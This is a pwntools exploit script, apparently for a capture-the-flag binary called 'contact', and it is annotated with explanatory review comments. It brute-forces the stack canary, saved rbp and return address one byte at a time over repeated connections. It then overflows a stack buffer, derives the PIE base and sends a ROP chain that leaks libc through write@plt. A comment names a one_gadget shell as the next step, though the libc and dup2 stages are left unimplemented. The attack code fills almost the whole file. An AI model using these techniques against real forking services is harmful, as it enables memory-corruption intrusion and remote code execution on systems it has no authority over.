- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- from pwn import *
- from struct import pack
# Target binary and the libc it is expected to be running against.  Assigning
# the ELF to context.binary lets pwntools derive arch/OS settings from it.
exe = context.binary = ELF('contact')
# Loaded for reference; `libc` is not referenced anywhere else in the visible
# script (the libc-base step of the plan is not implemented).
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Connection target, overridable on the command line via pwntools `args`
# (HOST=... PORT=...); the defaults point at a local instance.
host = args.HOST if args.HOST else '127.0.0.1'
port = int(args.PORT if args.PORT else 1337)
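def remote(argv=None, *a, **kw):
    '''Connect to the process on the remote host.

    Opens a TCP connection to the module-level ``host``/``port`` with
    pwntools' ``connect`` and returns the resulting tube.  ``argv``, ``*a``
    and ``**kw`` are accepted but ignored -- presumably kept so the signature
    matches the pwntools template's local/GDB start helpers.  Note that this
    deliberately shadows pwnlib's own ``remote`` pulled in by
    ``from pwn import *``.
    '''
    # `argv=None` instead of the template's `argv=[]`: a mutable default is
    # shared between calls.  The value is unused here anyway.
    return connect(host, port)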
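def start(argv=None, *a, **kw):
    '''Start the exploit against the target.

    Thin wrapper around ``remote``: every call opens a fresh connection, which
    is what the byte-at-a-time loops below rely on (one connection per
    guess).  All arguments are passed through unchanged and are ignored by
    ``remote``.
    '''
    # `argv=None` rather than a shared mutable `[]` default.
    return remote(argv, *a, **kw)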
# Bruteforce an 8-byte rbp register
def bruteforce(payload):
    '''Guess an 8-byte stack value one byte at a time.

    Each attempt appends the bytes found so far plus one candidate byte to
    ``payload``, sends it over a fresh connection and treats "the service
    still answered a line" as confirmation of the guess.  This only works if
    the value being guessed is identical on every connection (presumably a
    forking service that never re-randomises); a target that re-executes the
    binary per connection, or otherwise changes the value between attempts,
    defeats the approach.  The up-to-2048 short connections it makes are
    also a clearly visible pattern on the service side.

    Returns the recovered bytes as a str -- fewer than 8 if some round found
    no candidate that produced a reply.
    '''
    ret = ''
    # Silence pwntools' per-connection logging for the many attempts.
    context.log_level = 'error'
    for b in range(8):
        for v in range(256):
            io = start()
            io.recvline()  # banner/prompt line, discarded
            dummy = ret + chr(v)
            io.send(payload + dummy)
            try:
                # Any reply counts as success; its contents are not inspected
                # (`result` is unused).  If the target drops the connection
                # instead, recvline() raises (EOFError in pwntools) and control
                # goes to the except branch.
                result = io.recvline()
                ret = dummy
                print "bytes: " + hex(u64(ret.ljust(8, '\x00')))
                break
            except:
                # Bare except: also swallows KeyboardInterrupt, so Ctrl-C in
                # the middle of a run just moves to the next candidate.
                continue
            finally:
                io.close()
        # NOTE(review): if no candidate succeeded, `ret` is unchanged and the
        # next outer iteration re-guesses the same position.
    context.log_level = 'info'
    return ret
# Bruteforce an 8-byte canary (technically only 7, because the first byte is \x00)
def bruteforce_canary(payload):
    '''Guess the stack canary one byte at a time.

    Seeded with the leading NUL byte glibc's stack protector places in the
    canary, so only the remaining 7 bytes are guessed (up to 1792 attempts).
    Each attempt appends the bytes found so far plus one candidate byte to
    ``payload`` on a fresh connection; a reply line means the guess was right,
    a dropped connection means it was wrong.  This relies on the canary being
    the same on every connection (presumably a forking service); a target that
    re-executes per connection gets a fresh canary each time and this loop
    cannot converge.  The burst of short connections is itself a detectable
    signal.

    Returns the canary as a str (8 bytes on full success).
    '''
    canary = '\x00'
    # Silence pwntools' per-connection logging for the many attempts.
    context.log_level = 'error'
    for b in range(7):
        for v in range(256):
            io = start()
            io.recvline()  # banner/prompt line, discarded
            dummy = canary + chr(v)
            # If the byte is correct "Done." will be returned (author's note);
            # on a wrong byte the reply never arrives -- presumably the stack
            # protector aborts the process and the connection closes.
            io.send(payload + dummy)
            try:
                # Reply contents are not checked (`result` is unused); only
                # "a line arrived" vs "recvline() raised" matters.
                result = io.recvline()
                canary = dummy
                print "canary: " + hex(u64(canary.ljust(8, '\x00')))
                break
            except:
                # Bare except: swallows everything, including KeyboardInterrupt.
                continue
            finally:
                io.close()
        # NOTE(review): a round with no successful candidate leaves `canary`
        # unchanged, so the next round re-guesses the same position.
    context.log_level = 'info'
    return canary
# Use this one_gadget and not write manual ROP chains
# 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# rcx == NULL
# -- Exploit goes here --
# Plan of action:
# Using fd
# First fill the stack with filler up to offset 0x38
# Bruteforce the 8-byte canary starting with \x00
# Bruteforce the 8-byte rbp starting with \x7f (or potentially \x7d or \x7e, so brute-force an extra 2 bits)
# Bruteforce the 8-byte return address (according to Will, it should begin with 55 or 56)
# ROP Chain:
# Get .text base by subtracting the return address's offset in the ELF binary from the return address
# Leak libc using write@plt(4, write@got, 8)
# Get libc base by subtracting write's offset in the libc ELF binary from the leaked address
# Get dup2's address
# ---- Exploit body: every literal below was captured from one specific run ----
# The three brute-force calls are commented out and replaced by constants that
# are only valid for the process they were taken from.  That they can be
# reused at all is the precondition for the whole approach: the target
# presumably hands every connection the same stack canary, stack addresses and
# PIE base (e.g. a forking service).  Re-executing the binary per connection,
# or otherwise re-randomising, makes each of these values single-use and the
# byte-at-a-time guessing above stops working.
payload = fit({}, length=0x38)  # padding before the canary slot, per the plan above
# Brute force canary
# canary = bruteforce_canary(payload)
canary = p64(0x2e51750513e03a00)  # captured value; note the low byte is 0x00
log.info('final canary: ' + hex(u64(canary)))
payload += canary
# Brute force rbp
# rbp = bruteforce(payload)
rbp = p64(0x7ffd889dae00)  # captured saved rbp (presumably a stack address)
log.info('final rbp: ' + hex(u64(rbp)))
payload += rbp
# Brute force return address
# ret = bruteforce(payload)
ret = p64(0x55fdc4aee502)  # captured return address; used below to derive the PIE base
log.info('final ret: ' + hex(u64(ret)))
# Get .text base
text_base = u64(ret) - 0x14ee # 14ee is the address of the function that is being returned to
# 0x14ee is the unrelocated address of that return site in the ELF, so the
# difference is the PIE load base.  Assigning it to exe.address rebases the
# symbol/PLT/GOT lookups used below.
exe.address = text_base
log.info('.text begins at ' + hex(text_base))
payload += p64(exe.address + 0x00001562) # Jump to finish the vulnerable function
# Leak libc by calling write@plt(4, write@got, 8)
# fd 4 is presumably this connection's client socket (see "Using fd" in the
# plan above); write@got holds the resolved libc address of write().
rop1 = ROP(exe)
rop1.call(exe.plt.write, [4, exe.got.write, 8])
log.info('write@plt(4, write@got, 8):\n' + rop1.dump())
payload += rop1.chain()
io = start()
io.recvline()  # banner/prompt line, discarded
io.send(payload)
io.recvline()  # the service's normal reply (presumably "Done."), before the chain runs
io.interactive()
# The 8 leaked bytes are not parsed: the plan's remaining steps (libc base,
# dup2) are not implemented in the visible script, which just hands the
# connection to the user.